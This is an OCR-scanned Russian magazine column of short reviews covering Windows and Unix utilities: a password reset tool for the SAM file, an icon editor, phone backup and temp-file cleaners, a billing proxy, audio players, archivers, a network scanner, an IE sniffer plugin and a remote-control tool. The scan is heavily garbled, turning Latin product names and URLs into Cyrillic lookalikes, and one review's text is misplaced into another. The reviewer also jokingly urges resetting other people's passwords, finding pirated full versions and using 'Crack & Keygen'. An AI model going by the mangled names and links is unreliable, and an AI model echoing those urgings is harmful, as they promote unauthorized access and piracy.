Скачать: ѵѵѵѵѵѵ.кгкзоіі.сот 



Ас1іѵе@ РаззѵѵогсІ СГіапдег 

Версия: 3.0 ЬиіІсІ 0280 от 07.09.2005 

Операционная система: ѴѴіпсІоѵѵз І\ІТ, 2000, ХР, 2003 Зегѵег 

Распространение: $40 (демо-версия) 

Размер: 1,41 Мб 

Скачать: ѵѵѵѵѵѵ.раззѵѵогб-сбапдег.сот 



Судить о назначении этой программы можно уже по ее названию: 
она просто делает листинг директорий. Зачем это нужно? Пояс- 
ню на примере: приятель попросил у тебя списочек свежей музы- 
ки, а ты ее еще сам не рассортировал и понятия не имеешь, что 
там вообще навалено. Кликаем на нужную папку правой кнопкой 
мыши и выбираем пункт «Оепегаіе Іізііпд изіпд». Через некоторое 
время появляется файлик с полным списком находящегося внут- 
ри хлама. Разумеется, там есть и размеры каждого файла, и вре- 
мя его создания/изменения, и атрибуты, и СРС32 и, вообще, все, 
что душе угодно. Причем выводить информацию обо всем и сра- 
зу совсем не обязательно: с помощью фильтров можно указать 
маски обрабатываемых файлов. А выходной файл программа 
способна представить как в обычном текстовом формате, так и 
в приятном глазу НТМІ_-виде. Для самых ненормальных есть под- 
держка СЗѴ. Шаблоны выходных файлов можно настроить в кон- 
фигураторе, там же есть закладка предварительного просмотра. 
Вот такая гениально простая утилита (кстати, существует уже 
лет пять) позволяет избавиться от рутинной работы и сэкономить 
твое драгоценное время. Замечу, что настройки она не требует и 
после инсталла можно сразу приступать к использованию. 
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Из всех паролей неприятнее всего забыть пасс на систему. Без 
специальных средств в этом случае остается тупо смотреть в 
монитор :). Хотя способов для сброса пароля существует ве- 
ликое множество, даже в самой ѴѴіпсІоѵѵз имеется система АЗВ 
(АиіотаіесІ Зузіет Песоѵегу). Вот только заранее припасенной 
дискеты у тебя наверняка под рукой не окажется или РОО ее 
не прочитает, а может, ты вообще давно выбросил флопик за 
ненадобностью. Тут-то на помощь и придет программа от Асііѵе 
Оаіа Песоѵегу ЗоІІѵѵаге. И не прав тот, кто подумал, что она нуж- 
на только для того, чтобы сбросить пароль — эта тулза открыва- 
ет полный доступ к ЗАМ-файлу, а поэтому возможностей у нее 
будет больше. Скинуть пароль с ее помощью не проблема, но 
можно также включить заблокированный аккаунт, или, скажем, 
расширить для определенного юзера время, в течение которого 
ему будет разрешен вход в систему. Не подумай, что ты быстро из- 
влечешь из ЗАМ’а пароль. Нифига! Он хранится в зашифрованном 
виде, и для его подбора есть масса других программ — вспомнить 
хотя бы Саіп & АЬеІ ( ѵѵѵѵѵѵ.охісШ . 

Интерфейс Ас1іѵе@Раззѵѵогб СНапдег прост. Перед нами те же 
самые пункты и опции, что и в Сотриіег Мападетепі -> І_осаІ 
ІІзегз апб Огоирз, только без ОІІІ-интерфейса. Все действия осу- 
ществляются через текстовое меню, знакомое тебе со времен 
Ібізк’а. В качестве загрузочного носителя программа позволяет 
использовать дискету, компакт-диск или ІІЗВ-накопитель, кото- 
рый удобно таскать с собой. Ограничения демо-версии несколь- 
ко сковывают наши действия. Но не давай разработчикам драз- 
нить себя — ищи полную версию приложения. Ну а после того, 
как ты все-таки сбросишь свой пароль, тебе захочется сделать 
это и с чьим-нибудь чужим. Главное — не перестараться :). 
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ІсопѴѴогкзбор 

Версия: 6.01 от 17.11.2005 

Операционная система: ѴѴІпсІоѵѵз 98, Ме, І\ІТ, 2000, ХР, Ѵізіа 
Распространение: $34,95 (30-дневная пробная версия) 

Размер: 1 1 ,25 Мб 

Скачать: ѵѵѵѵѵѵ.ахіаііз.сот/ісопѵѵогкзітор/ 

В двух словах эту прогу можно охарактеризовать так: РИоІозИор 
для иконок. Если профи используют векторную графику и рису- 
ют иконки в СогеЮВАѴѴ, то ты можешь создать шедевр ничем не 
хуже в ІсопѴѴогкзНор. Похожего софта хватает, но возможности 
альтернативных продуктов существенно скромнее. Словом, этой 
проге есть чем похвастаться. Поддерживается создание иконок 
в новомодных форматах ѴѴІпсІоѵѵз Ѵізіа и Мае ОЗ X 10.4 Тідег 
(«старый» ѴѴІпсІоѵѵз ХР с аІрИа-каналом, разумеется, тоже), вклю- 
чая преобразование между ними. Благодаря технологии Ітаде 
ОЬіесІз удобно создавать иконки из заготовленных шаблонов, 
тем более что 150 таких шаблонов по умолчанию идут в комплек- 
те с программой. Не возбраняется использование любых изобра- 
жений, даже фотографий. Поддерживается и экспорт из иконок 
в графические файлы. Если всего этого станет мало, то встро- 
енный графический редактор окажет полезные услуги: от ком- 
бинирования иконок в режиме бгад’п’бгор до создания таковых с 
нуля. В программу даже встроен модуль для кастомайзинга сис- 
темы. Очень удобная штука. Тепер, нарисовав новую иконку, ты 
можешь тут же посмотреть, как она смотрится на рабочем месте. 
Так что создать набор иконок для системы или для программного 
продукта, если ты программер, — пара пустяков. И еще: на офи- 
циальном сайте существует аналогичный продукт для создания 
курсоров, который называется АХ-Сигзогз. 




МОВШесІІІ! 

Версия: 2.0.0.10 от 27.04.2006 

Операционная система: ѴѴІпсІоѵѵз 98, Ме, ЫТ, 2000, ХР 
Распространение: $25 (7-дневная пробная версия) 
Размер: 15,81 Мб 
Скачать: ѵѵѵѵѵѵ.тобііесііі.сот 



Как-то под вечер приспичило мне забэкапить адресную книжку с 
телефона. Но не тут-то было. Телефон у меня не особо распро- 
страненный (РИіІірз 650), и софта для него крайне мало. Да еще 
и дата-кабеля не было — только инфракрасный порт. С таким 
раскладом нормальный человек давно бы забил на эту идею, а 
я пошел на офсайт РИіІірз. Программу для бэкапа я нашел, но... 
штуковина весила более 40 Мб, к тому же в описаниях не было ни 
слова об ЮА. Двинувшись дальше, я наткнулся на МОВІІ_есІіі!. В 
программе для работы с телефоном (в последней версии), прямо 
как по заказу, появилась поддержка моей мобилы. Минут через 
10 после установки бэкап был сделан, и я уже изучал остальные 
функции приложения. На текущий момент МОВНебіІ! поддержи- 
вает 258 моделей телефонов ( ѵѵѵѵѵѵ.тоЫІебіІ.сот/рІпопез.азр ). 
Резервные копии можно сделать не только адресной книги, но 



и 5МЗ/ММЗ, набранных/принятых/пропущенных звонков, есть 
даже поддержка М3 ОиІІоок/ОиІІоок Ехргезз (на случай, если твои 
контакты в телефоне и почтовом клиенте синхронизируются). Ре- 
дактирование адресной книги удобнее делать через компьютер, 
а не на убогой телефонной клавиатуре. Забыл сказать, что все 
те же действия доступны и для ЗІМ-карты, но архивы сообщений 
в таком случае будут раздельными. Через саму программу мож- 
но отредактировать и залить на телефон графические файлы 
или музыку — функция пустяковая, но все равно очень приятная. 
Только первые 7 дней МОВІІ_есІі1! будет полнофункциональной, 
затем появятся ограничения. 




ЕгазеТетр 

Версия: 3.3. 1.8 от 15.03.2006 

Операционная система: ѴѴІпсІоѵѵз 98, Ме, І\ІТ, 2000, ХР 
Распространение: бесплатно 
Размер: 47 Кб 

Скачать: ѵѵѵѵѵѵ.посІезоІІ.сот/ЕгазеТетр/ 

В один прекрасный день, когда места на жестком диске будет не 
хватать, ты в очередной раз задумаешься: «А что бы такое уда- 
лить?! » . Верный шаг — подчистить всякого рода временные фай- 
лы и папки. Проблема в том, что раскиданы они повсюду, и каж- 
дый раз удалять их вручную довольно утомительно. Да и зачем, 
если давно существуют специальные приложения. Например, 
утилита ЕгазеТетр. Во время первого запуска тулза работает в 
режиме геаб-опіу (ключ «Дезі») и лишь проверяет возможность 
удаления файлов. А далее — пошло-поехало. Без вмешательс- 
тва с твоей стороны она быстро расправится с мусором из об- 
щей папки ѴѴІІ\ЮОѴѴ8\ТЕМР и персональным темпом для каждо- 
го юзера — тот, что хранится в Ооситепіз апб Зеіііпдз. Также 
удаляются файлы дампов. Например, если у тебя 1 Гб оператив- 
ки, то наверняка имеется файл МЕМОВУ.ОМР с точно таким же 
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размером, возникший после очередного ВЗоО’а. После очистки 
прога отрапортует о количестве и размере удаленных файлов, и 
если ты ни разу этого не делал, то размер освобожденного про- 
странства тебя приятно удивит (или даже испугает). В настройке 
программа не нуждается — все возможные параметры задаются с 
помощью ключей при старте. Например, «/Оауз X» позволит уда- 
лить файлы старше Х-дней. Из приятных мелочей — встроенный 
интернет-апдейтер (хотя чего там обновлять?). Но есть минус: 
программа требует М3 .ЫЕТ Ргатеѵѵогк 2.0, который, правда, ты 
без труда найдешь на ИДр://тзбп.ппісгозоІ1.сопп . И не забудь на- 
жать на кнопочку «Сгаск & Кеудеп» на офсайте! 

Тгаііісіпзресіог 

Версия: 1.1.3.1701 от 17.08.2005 
Операционная система: 2000, ХР, 2003 Зегѵег 
Распространение: от 700 руб. (30-дневная пробная версия) 

Размер: 12,5 Мб 
Скачать: ѵѵѵѵѵѵ.зтагі-зоіі.ги/ 

Если ты решил стать провайдером и барыжить инетом в своей но- 
воиспеченной локалке, то это софтина строго для тебя. Представ- 
ляет собой симбиоз биллинга и прокси-сервера. Программа очень 
достойно выглядит рядом с конкурентами (полный список возмож- 
ностей можно посмотреть тут: ѵѵѵѵѵѵ.зтаг1-зоІ1.ги/?раае=1ізрес ). Ба- 
зируется все на стандартных серверных службах ѴѴіпбоѵѵз: ВРАЗ, 
ІСЗ, ОЫЗ, а доступ к проге осуществляется через оснастку в ММС. 
Биллинговая часть отвечает за авторизацию, разграничение прав 
и тарификацию пользователей, подсчет трафика и его детальный 
анализ (с таблицами, графиками, диаграммами), различного рода 
ограничения. Прокси же — за кэширование трафика и фильтра- 
цию контента, форвардинг и блокировку. Помимо этого имеется 
встроенный брандмауэр с возможностью гибкой настройки для 
защиты локалки, ЗМТР-шлюз, позволяющий выставить в инет 




внутренний почтовый сервак, шейпер для ограничения скоростей, 
а также абѵапсеб гоиііпд, позволяющий перенаправлять опреде- 
ленный трафик на другие интерфейсы. Многое автоматизируется 
при помощи скриптов, для этого у софтины есть свой АРІ и пол- 
ная документация к нему на русском. Решений на такой платфор- 
ме можно создать великое множество, к тому же разработчики 
частенько штампуют беты, добавляя менее полезные функции, 
которые, однако, легко могут пригодиться в хозяйстве. Теперь о 
клиентской части: это специальное приложение, которое позво- 
ляет юзеру управлять своим инетом, то есть фильтровать трафик 
в соответствии с уровнями, заданными провайдером, просматри- 
вать статистику через веб-интерфейс и избегать утомительной 
настройки каждой, использующей Интернет, проги, вбивая адрес 
и порт прокси-сервера (кстати говоря, такая возможность доступ- 
на далеко не везде). Как видишь, все просто как дважды два. 
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ПЕТР СЕМИЛЕТОВ 

/ ѴѴѴѴѴѴ.ПОХТОІІ.КІЕѴ.ІІА / 



ІІІЧІХѴѴАПЕ2 



Аисіасіоиз 

РОЗІХ (*В30, І_іпих, Зоіагіз...) 

Размер (исходник в Ідф: 3,2 Мб. 

ИПр://аибасіоиз-тесІіа-рІауег.огд 
Лицензия: ОШ ОРІ_ 

Этот плеер я установил поначалу ис- 
ключительно для воспроизведения 
песен Владимира Высоцкого. У меня 
большая их коллекция, а тэги в них 
русские. Подружить же мой люби- 
мый Атагок с русскими тэгами, даже 
конвертируя их с помощью ЕазуТад в 
кодировку ІІТР-8, — задача из облас- 
ти квантовой физики. 

Скачал я исходник Аисіасіоиз, скон- 
фигурировал, собрал, установил и 
запустил. Работает. Плеер знакомый. 

Еще бы — это же форк ВМРх, пле- 
ер, которому предшествовал другой 
плеер — ВМР, созданный, в свою 
очередь, на основе кода классичес- 
кого ХММЗ. 

Из плееров, созданных по мотивам 
этой живой легенды, Аисіасіоиз пон- 
равился мне больше всего. Интер- 
фейс приятный. Плагинов, идущих в составе дистрибутива, боль- 
ше, нежели в ВМР. Эти плагины обеспечивают плееру поддержку 
таких форматов, как Одд, МРЗ, трекерные форматы (исполь- 
зуется популярный движок МобРІид), ѴѴАѴ, МЮІ (посредством 
Тітібііу), ѴѴМА, файлы музыки от игровых приставок вроде ЗЕОА 
Медабгіѵе и ІЧЕЗ. Также плеер может играть обычные аудиодис- 
ки. Кстати, ѴѴАѴ’ы Аисіасіоиз воспроизводит лучше, чем текущая 
версия Атагок. 

В целом Аисіасіоиз можно считать новым воплощением ХММЗ, 
только современным, да еще перенесенным с библиотеки ѲТК+1 
на ѲТК+2. Из отрицательных сторон, насколько я мог заметить, 
есть только одна — отсутствие поддержки тэгов формата Ю3ѵ2. 
Которые, впрочем, не так уж часто используются. 

Р72ІР 

РОЗІХ (*ВЗО, Ыпих, Зоіагіз...) 

Размер (исходник в Іаг.Ь22): 1,4 Мб. 
бйр://р72Ір.зоигсеІогде.пеІ 
Лицензия: ОШ (ЗРІ_ 

Р72ІР — юниксовый порт популярного в ѴѴіпсІоѵѵз ОРЛ-архивато- 
ра 72ір, его консольной версии. По умолчанию в нем использует- 
ся алгоритм сжатия І_2МА, который позволяет добиться, пожалуй, 
наивысшей степени сжатия по сравнению с другими архиватора- 




ми. Не зря пираты любят делать дистрибутивы игр с применени- 
ем именно 72Ір. 

Однако приведу результаты собственного тестирования. Есть у 
меня каталог, куда я складываю всякий хлам, чтобы разобрать- 
ся с ним позже. Суммарный объем файлов в этом каталоге — 
500317 Кб (477 Мб). Там и графика, и тексты, и музыка. В общем, 
разное, смешанное содержимое. Упаковываю все это добро с 
помощью В2ір2, на выходе получаю файл размером 295684 Кб 
(282 Мб). Теперь упаковываю этот же каталог, используя 7га. По- 
лучаю 297626 Кб (283 Мб). Понимаю, что пример этот несколько 
противоречит выше сказанному о наилучшей степени сжатия, но 
под ѴѴіпсІоѵѵз ситуация была обратная — Вгір2 проиграл 7га. Тем 
не менее, на смешанном содержимом результаты упаковочных 
возможностей обоих архиваторов практически одинаковы (при 
установках по умолчанию). 

Архиватор написан на С++, без проблем устанавливается из 
исходника. Бинарная часть программы состоит из одного только 
файла 7га. Может архивировать каталоги. Например, так: 

$ 7га а <имя архива. 7т> <имя каталога> 

Параметр ‘а’ (без дефиса) указывает архиватору на то, что надо 
добавить в архив каталог или файл. 

Выводы: фактически 72ір ни в чем не уступает Вгір2, кроме разве 
что степени его поддержки в разных программах. Например, ты 
не «зайдешь» в 72-архив из того же МібпідИі Соттапбег. Одна- 
ко, например, КЭЕ’шный архиватор Агк шустро открыл 72-архив 
— полагаю, что использовал консольную версию самого 72Ір. Учи- 
тывая большую инертность в области использования архивато- 
ров (тот же Вгір2 до сих пор не переплюнул по популярности ста- 
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рого-доброго дгір’а), продвижение 7гір среди линуксоидов будет 
медленным, но, вполне возможно, будущее именно за ним. 

Несоѵегсіт 

РОЗІХ (*В5Б, І_іпих, Зоіагіз. ..) 

Размер (исходник в Ідг): 9 Кб. 

ИйрУ/ѵѵѵѵѵѵ.ѵапГіеизсІеп.сот/гесоѵегсІт/ 

Лицензия: ОШ ОРІ_ 

Консольная утилита, которая может помочь прочитать информа- 
цию с дефектного СО или 0\Ю. Вообще говоря, первым делом 
надо попробовать вымыть его мылом и просушить, а если эта 
гигиеническая мера не поможет, тогда пожалуйста — запускай 
Весоѵегбт. Кроме того, Весоѵегбт можно использовать для про- 
чтения информации с флоппи- и жестких дисков. 

Результат работы Ресоѵегбт — это образ диска. Задать его имя 
нужно ключиком ‘-о <имя файла>’. При этом файл с таким име- 
нем не должен существовать. Что еще интересного может делать 
программа? Может вывести список сбойных блоков (‘-I <имя 
файла>’). Параметр ‘-з <скорость>’ устанавливает скорость вра- 
щения для СО и ОѴО. 

В состав дистрибутива Весоѵегсіпп входит также утилита 
тегдеЬаб. Она служит для того, чтобы «слить» несколько обра- 
зов диска в один. Поясню на примере. Допустим, у тебя есть два 
диска с одной и той же информацией. Назовем эти диски А и 
Б. Оба повреждены, но повреждения у них в разных секторах. 
С помощью Весоѵегбт ты делаешь образы обоих дисков и для 
первого диска создаешь список «бэдов» (параметром Ч <такой- 
то файл>’). Затем скармливаешь утилите тегдеЬаб оба образа и 
список «бэдов». В результате тегдеЬаб смотрит по списку, где 
есть «бэды» на диске А, заменяет их нормальными данными из 
образа Б и выдает восстановленный образ диска. 

ОпаигаІ 

РОЗІХ (*ВЗБ, І_іпих, Зоіагіз...) 

Размер (исходник в іаг.д т)\ 339 Кб. 

ИПр://дпаигаІ.зоигсеЬгде.пеІ/ 

Лицензия: ОШ ОРІ_ 

Эту штука относится к разряду программ, которые нельзя ис- 
пользовать эпилептикам. Сразу предупреждаю. ОпаигаІ — ге- 
нератор бинауральных импульсов, иначе говоря — средство 
синхронизации волн мозга. Мозг человека генерирует элект- 
ромагнитные волны. В разных состояниях сознания (например, 
сонное или бодрое) — разные волны. Учеными было установ- 
лено, что если стимулировать мозг соответствующими звуко- 
выми волнами, то мозг как бы входит с ними в резонанс. Таким 
образом, можно, слушая в наушниках обработанный особым 
образом тихий шум, перевести мозг в состояние «бодрое» или, 
напротив, «умиротворенное». Подробности о частотах и их 
влиянии на мозг ты можешь быстро найти по Гуглу (набери там 
«мозговые волны»), а вот применить все это на практике тебе 
поможет ОпаигаІ. 
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СИМОНОВ ИЛЬЯ АКА 5НТІІВМОѴІК 

/ 8НТІЛШОѴІК@ПЕАІ_.ХАКЕР.ГШ / 



Х-ТООІ-2 



МедаРіпд 4.6 

ѴѴІп 9х/І\ІТ/2к/ХР 

ЗбагеѴѴаге 

Зіге: 4,28 Мб 

ѵѵѵѵѵѵ . т ад пеіозоіі . сот 



будет проведено, то всеми любимый ІЕ обзаведется еще одной 
кнопкой на своей панели. Нажав на нее, ты активируешь про- 
грамму ІЕѴѴаІсИ. Утилита позволяет просматривать и анализиро- 
вать данные (Иеабегз, (ЗЕТ, РОЗТ, Соокіез), отправляемые (полу- 
чаемые) по НТТР/НТТРЗ. Кроме того, можно просматривать код 
страницы прямо в окне браузера. 



МедаРіпд — мощная утилита для мониторинга сети, включаю- 
щая в себя целый набор средств: Ііпдег, пате Іоокир, пеіѵѵогк 
Ііте зупсИгопігег, ріпд, рог! зсаппег, !гасегои!е и ѵѵНоіз. Помимо 
этого программа содержит в себе целый ряд самостоятельных 
инструментов для поимки конкретной информации. Например, 
ІР-сканер проверяет диапазон ІР-адресов, определяет, какие из 
них активны, преобразует имена компьютеров, если выбран со- 
ответствующий режим. Таким же образом можно воспользовать- 
ся сканером І\Іе!ВІОЗ. Такая интересная вещь, как ЗИаге Зсаппег, 
обнаруживает открытые общедоступные ресурсы в домене или 
диапазоне ІР-адресов. Также имеется сканер портов: с помощью 
него можно сканировать диапазон портов, причем как автори- 
зованные порты, так и те, что часто используются взломщиками. 
После того как ты проведешь сканирование, программа выдаст 
тебе подробный отчет о своей работе в текстовом или гипертек- 
стовом формате. 

ІЕѴѴаісГі 



ѴѴІп 9х/І\ІТ/2к/ХР 
ЗЬагеѴѴаге 
Зіге: 881 Кб 
ѵѵѵѵѵѵ. іеѵѵаІсГі. сот 




Сниферами и анализаторами пакетов сейчас никого не пора- 
зишь, поэтому постараюсь удивить тебя небольшим узкоспеци- 
ализированным снифером, выполненным в виде плагина к на- 
шему любимому Ослику. После установки этой замечательной 
программы потребуется перезагрузка компьютера. Но когда все 



ЗруАпуѵѵбеге 

ѴѴІп 9х/І\ІТ/2к/ХР 
ЗГіагеѴѴаге 
Зіге: 1,33 Мб 
ѵѵѵѵѵѵ. зруІесб-ѵѵеЬ. сот 




Ты уже поставил утилиту удаленного администрирования себе на 
компьютер с нашего диска? Правильно сделал. Однако если ты 
работаешь администратором или же просто хочешь управлять 
ѴѴіп-системой удаленно (естественно, с разрешения владель- 
ца системы), то эта утилита как раз для тебя. Хотя нет, как раз 
управлять можно и АѴѴРС, а вот полный, тотальный контроль 
компьютера, даже с динамическим ІР-адресом, не закрывая бра- 
узер, — вот что предлагает тебе данная утилита. Действительно, 
после установки тебе потребуется сконфигурировать сервер, 
поставить пароль, настроить ключи безопасности (по необходи- 
мости). Только после этого, запустив сервер, ты можешь спокой- 
но выйти в Интернет на этой системе и уехать, например, хоть в 
Баден-Баден, где, собственно, также выйдя в глобальную Сеть, 
ты забьешь айпишник своей такчи в браузере, введешь пароль — 
и все! Делай, что хочешь. Мало тебе удаленного рабочего стола? 
Так, может, список процессов посмотрим и убьем ненужные? За- 
был поставить боѵѵпіоаб таз!ег на закачку? Так давай запустим! 
Уж про банальный ребут и шатдаун я вообще молчу. 
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